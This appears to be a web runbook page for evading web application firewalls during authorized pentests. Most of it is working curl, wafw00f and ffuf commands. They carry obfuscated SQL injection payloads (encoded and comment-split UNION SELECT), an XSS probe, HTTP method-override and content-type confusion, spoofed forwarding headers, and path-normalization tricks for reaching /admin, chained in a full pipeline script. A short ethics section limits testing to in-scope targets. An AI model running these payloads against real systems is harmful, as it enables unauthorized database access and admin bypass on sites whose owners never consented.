Webupdated Oct 1, 2026
Proxy / WAF Protections Bypass
Techniques to evade web application firewalls and reverse proxies through encoding, parsing, and routing disagreements.
toolbox:wafw00fffufcurl
A WAF evasion runbook for bug bounty / authorized pentest on in-scope targets only. Goal: find where the firewall and the origin disagree about what a request means, then deliver a working payload through the gap.
1. Fingerprint the defense
wafw00f https://target.com
curl -s -o /dev/null -w '%{http_code}\n' \
"https://target.com/?q=<script>alert(1)</script>"
curl -sI "https://target.com/" | grep -iE 'server|via|x-served-by|cf-'
Save the block status/body so you can tell a bypass from a normal response.
2. Establish a baseline
curl -s "https://target.com/api/item?id=1" # allowed
curl -s "https://target.com/api/item?id=1%20AND%201=1" # blocked
3. Encoding and obfuscation
curl -s "https://target.com/api/item?id=1%27"
curl -s "https://target.com/api/item?id=1%2527"
curl -s "https://target.com/api/item?id=1+UnIoN+SeLeCt+1,2,3"
curl -s "https://target.com/api/item?id=1/**/UNION/**/SELECT/**/1,2,3"
curl -s "https://target.com/api/item?id=1%09UNION%0ASELECT%091,2,3"
Try overlong UTF-8, unicode escapes (%u0027), and inline comments (/*!50000SELECT*/).
4. Method and content-type confusion
curl -s -X POST "https://target.com/api/search" \
-H "Content-Type: application/json" -d '{"q":"1 UNION SELECT 1,2,3"}'
curl -s -X POST "https://target.com/api/search" \
-H "Content-Type: text/plain" --data 'q=1 UNION SELECT 1,2,3'
curl -s -X PUT "https://target.com/api/search" --data 'q=1 AND 1=1'
curl -s -X POST "https://target.com/api/search" \
-H "X-HTTP-Method-Override: PUT" --data 'q=1 AND 1=1'
5. Header and routing tricks
for h in "X-Forwarded-For: 127.0.0.1" "X-Real-IP: 127.0.0.1" \
"X-Originating-IP: 127.0.0.1" "X-Original-URL: /admin"; do
curl -s "https://target.com/" -H "$h"
done
for p in "/admin/..;/" "/%2fadmin" "//admin" "/admin/." "/ADMIN/"; do
curl -s -o /dev/null -w "$p -> %{http_code}\n" "https://target.com$p"
done
# Automate payload variants
curl -s "https://target.com/api/item?id=1" > req.txt
ffuf -request req.txt -request-proto https -w payloads.txt -mc all -fs 0
Full pipeline
TARGET="https://target.com"
wafw00f "$TARGET"
curl -sI "$TARGET/" | grep -iE 'server|via|x-served-by|cf-'
curl -s "$TARGET/api/item?id=1" -o /dev/null -w 'allowed: %{http_code}\n'
curl -s "$TARGET/api/item?id=1%20AND%201=1" -o /dev/null -w 'blocked: %{http_code}\n'
curl -s "$TARGET/api/item?id=1%2527"
curl -s "$TARGET/api/item?id=1/**/UNION/**/SELECT/**/1,2,3"
curl -s -X PUT "$TARGET/api/search" --data 'q=1 AND 1=1'
curl -s "$TARGET/" -H "X-Forwarded-For: 127.0.0.1" -H "X-Original-URL: /admin"
for p in "/admin/..;/" "/%2fadmin" "//admin" "/ADMIN/"; do
curl -s -o /dev/null -w "$p -> %{http_code}\n" "$TARGET$p"
done
Ethics & legality
- Only test targets within an authorized scope; WAF evasion is high-risk and easily mistaken for an attack.
- Limit fuzzing volume so you do not trip global protections or affect availability.
- Do not attempt origin-IP discovery or direct-to-origin attacks unless explicitly in scope.
- Keep logs of baseline and blocked responses to justify the finding.